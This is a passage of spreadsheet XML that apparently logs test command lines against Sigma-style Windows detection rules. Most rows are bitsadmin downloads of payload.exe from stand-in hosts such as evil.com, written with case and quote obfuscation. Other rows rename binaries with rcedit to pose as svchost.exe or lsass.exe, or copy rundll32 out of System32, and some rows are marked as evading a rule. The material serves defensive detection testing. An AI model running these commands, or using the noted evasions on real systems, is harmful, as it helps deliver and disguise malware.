      <c r="B1002" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1002" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1002" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1002" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tranSFEr myjob /download /priority normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1002" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1002" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1002" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1002" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1002" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1003" ht="15.75" customHeight="1" s="42">
      <c r="A1003" s="43" t="n"/>
      <c r="B1003" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1003" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1003" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1003" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download /"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1003" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1003" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1003" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1003" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1003" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1003" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1004" ht="15.75" customHeight="1" s="42">
      <c r="A1004" s="43" t="n"/>
      <c r="B1004" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1004" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1004" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1004" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myjob /download -"priority" normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1004" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1004" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1004" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1004" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1004" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1004" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1005" ht="15.75" customHeight="1" s="42">
      <c r="A1005" s="43" t="n"/>
      <c r="B1005" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_extensions</t>
        </is>
      </c>
      <c r="C1005" s="36" t="inlineStr">
        <is>
          <t>File With Suspicious Extension Downloaded Via Bitsadmin</t>
        </is>
      </c>
      <c r="D1005" s="36" t="inlineStr">
        <is>
          <t>5b80a791-ad9b-4b75-bcc1-ad4e1e89c200</t>
        </is>
      </c>
      <c r="E1005" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TrAnsfer myjob /downlOAd /PrioriTy normal http://example.com/payload.tmp C:\Users\Public\payload.tmp</t>
        </is>
      </c>
      <c r="F1005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1005" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1005" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1005" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1005" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1005" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1006" ht="15.75" customHeight="1" s="42">
      <c r="A1006" s="43" t="n"/>
      <c r="B1006" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1006" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1006" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1006" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1006" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1006" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1006" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1006" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1006" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1007" ht="15.75" customHeight="1" s="42">
      <c r="A1007" s="43" t="n"/>
      <c r="B1007" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1007" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1007" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1007" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /download /PrIORItY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1007" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1007" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1007" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1007" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1007" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1008" ht="15.75" customHeight="1" s="42">
      <c r="A1008" s="43" t="n"/>
      <c r="B1008" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1008" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1008" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1008" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /doWnLOaD /pRIoRitY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1008" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1008" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1008" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1008" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1008" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1008" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1009" ht="15.75" customHeight="1" s="42">
      <c r="A1009" s="43" t="n"/>
      <c r="B1009" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1009" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1009" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1009" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /DoWNlOAd /"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1009" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1009" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1009" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1009" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1009" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1009" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1010" ht="15.75" customHeight="1" s="42">
      <c r="A1010" s="43" t="n"/>
      <c r="B1010" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1010" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1010" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1010" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob /dOWnloAd /PriOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1010" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1010" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1010" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1010" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1010" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1010" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1011" ht="15.75" customHeight="1" s="42">
      <c r="A1011" s="43" t="n"/>
      <c r="B1011" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1011" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1011" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1011" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /DOWNLOAd -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1011" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1011" s="43" t="n"/>
      <c r="J1011" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1011" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1012" ht="15.75" customHeight="1" s="42">
      <c r="A1012" s="43" t="n"/>
      <c r="B1012" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1012" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1012" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1012" s="36" t="inlineStr">
        <is>
          <t>bitsadmin -"transfer" myJob /doWnLoAD /pRiOrIty high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1012" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1012" s="43" t="n"/>
      <c r="J1012" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1012" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1013" ht="15.75" customHeight="1" s="42">
      <c r="A1013" s="43" t="n"/>
      <c r="B1013" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1013" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1013" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1013" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /tRaNSFER myJob -"download" /PRIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1013" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1013" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1013" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1013" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1013" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1014" ht="15.75" customHeight="1" s="42">
      <c r="A1014" s="43" t="n"/>
      <c r="B1014" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1014" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1014" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1014" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /priority high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1014" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1014" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1014" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1014" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1014" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1014" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1015" ht="15.75" customHeight="1" s="42">
      <c r="A1015" s="43" t="n"/>
      <c r="B1015" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1015" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1015" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1015" s="43" t="inlineStr">
        <is>
          <t>bitsadmin /TranSfER myJob /"download" -"priority" high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1015" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1015" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1015" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1015" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1015" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1015" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1016" ht="15.75" customHeight="1" s="42">
      <c r="A1016" s="43" t="n"/>
      <c r="B1016" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_susp_targetfolder</t>
        </is>
      </c>
      <c r="C1016" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder</t>
        </is>
      </c>
      <c r="D1016" s="36" t="inlineStr">
        <is>
          <t>2ddef153-167b-4e89-86b6-757a9e65dcac</t>
        </is>
      </c>
      <c r="E1016" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob -"download" /PrIoritY high https://evil.com/payload.exe C:\Users\JohnDoe\Downloads\payload.exe</t>
        </is>
      </c>
      <c r="F1016" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1016" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1016" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1016" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1016" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1016" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1017" ht="15.75" customHeight="1" s="42">
      <c r="A1017" s="43" t="n"/>
      <c r="B1017" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1017" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1017" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1017" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /transfer myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1017" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1017" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1017" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1017" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1017" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1018" ht="15.75" customHeight="1" s="42">
      <c r="A1018" s="43" t="n"/>
      <c r="B1018" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1018" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1018" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1018" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /"transfer" myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1018" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1018" s="43" t="n"/>
      <c r="J1018" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1018" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1019" ht="15.75" customHeight="1" s="42">
      <c r="A1019" s="43" t="n"/>
      <c r="B1019" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_bitsadmin_download_uncommon_targetfolder</t>
        </is>
      </c>
      <c r="C1019" s="36" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To An Uncommon Target Folder</t>
        </is>
      </c>
      <c r="D1019" s="36" t="inlineStr">
        <is>
          <t>6e30c82f-a9f8-4aab-b79c-7c12bce6f248</t>
        </is>
      </c>
      <c r="E1019" s="36" t="inlineStr">
        <is>
          <t>bitsadmin /TRAnsfER myJob http://example.com/payload.exe C:\Windows\System32\drivers\etc\payload.exe</t>
        </is>
      </c>
      <c r="F1019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1019" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1019" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1019" s="43" t="inlineStr">
        <is>
          <t>File Download Via Bitsadmin To A Suspicious Target Folder (2ddef153-167b-4e89-86b6-757a9e65dcac); File Download Via Bitsadmin (d059842b-6b9d-4ed1-b5c3-5b89143c6ede)</t>
        </is>
      </c>
      <c r="J1019" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1019" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1020" ht="15.75" customHeight="1" s="42">
      <c r="A1020" s="43" t="n"/>
      <c r="B1020" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C1020" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D1020" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E1020" s="36" t="inlineStr">
        <is>
          <t>copy rcedit-x64.exe r.exe &amp;&amp; .\r.exe target.exe --set-version-string "Original""FileName" "svchost.exe"</t>
        </is>
      </c>
      <c r="F1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1020" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1020" s="43" t="n"/>
      <c r="J1020" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1020" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1021" ht="15.75" customHeight="1" s="42">
      <c r="A1021" s="43" t="n"/>
      <c r="B1021" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C1021" s="36" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D1021" s="36" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E1021" s="36" t="inlineStr">
        <is>
          <t>ren rcedit-x64.exe not_rcedit.exe &amp;&amp; .\not_rcedit.exe target.exe --set-version-string "OriginalFileName" "lsass.exe"</t>
        </is>
      </c>
      <c r="F1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1021" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1021" s="43" t="n"/>
      <c r="J1021" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1021" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1022" ht="15.75" customHeight="1" s="42">
      <c r="A1022" s="43" t="n"/>
      <c r="B1022" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C1022" s="36" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D1022" s="36" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E1022" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start remote.exe -arg1 -arg2</t>
        </is>
      </c>
      <c r="F1022" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1022" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1022" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1022" s="43" t="n"/>
      <c r="J1022" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1022" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1023" ht="15.75" customHeight="1" s="42">
      <c r="A1023" s="36" t="n"/>
      <c r="B1023" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C1023" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D1023" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E1023" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -c "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F1023" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1023" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1023" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1023" s="43" t="n"/>
      <c r="J1023" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1023" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1024" ht="15.75" customHeight="1" s="42">
      <c r="A1024" s="36" t="n"/>
      <c r="B1024" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C1024" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D1024" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E1024" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOp -C "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F1024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1024" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1024" s="43" t="n"/>
      <c r="J1024" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1024" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1025" ht="15.75" customHeight="1" s="42">
      <c r="A1025" s="36" t="n"/>
      <c r="B1025" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C1025" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D1025" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E1025" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nOp -c "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F1025" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1025" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1025" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1025" s="36" t="n"/>
      <c r="J1025" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1025" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1026" ht="15.75" customHeight="1" s="42">
      <c r="A1026" s="36" t="n"/>
      <c r="B1026" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C1026" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
      <c r="D1026" s="36" t="inlineStr">
        <is>
          <t>f5d19838-41b5-476c-98d8-ba8af4929ee2</t>
        </is>
      </c>
      <c r="E1026" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoP -Command "[System.IO.File]::Copy('C:\Windows\System32\rundll32.exe', 'C:\Temp\rundll32.exe')"</t>
        </is>
      </c>
      <c r="F1026" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1026" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1026" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1026" s="43" t="n"/>
      <c r="J1026" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1026" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1027" ht="15.75" customHeight="1" s="42">
      <c r="A1027" s="36" t="n"/>
      <c r="B1027" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_system_dir_lolbin</t>
        </is>
      </c>
      <c r="C1027" s="36" t="inlineStr">
        <is>
          <t>LOL-Binary Copied From System Directory</t>
        </is>
      </c>
